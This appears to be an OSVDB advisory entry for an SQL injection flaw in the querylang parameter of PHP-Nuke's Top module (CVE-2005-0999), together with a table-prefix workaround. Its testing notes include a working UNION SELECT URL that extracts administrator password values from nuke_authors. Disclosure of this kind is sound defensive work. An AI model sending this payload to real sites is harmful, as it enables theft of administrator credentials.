PHP-Nuke Top Module querylang Parameter SQL Injection

ID OSVDB:15324
Type osvdb
Reporter OSVDB
Modified 2005-04-06T07:49:20


Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Change the table prefix from the default "nuke_" to something random such as "zloqf7_".

Manual Testing Notes

http://[victim]/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION %20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*


Vendor URL: Secunia Advisory ID:14866 Other Advisory URL: Mail List Post: CVE-2005-0999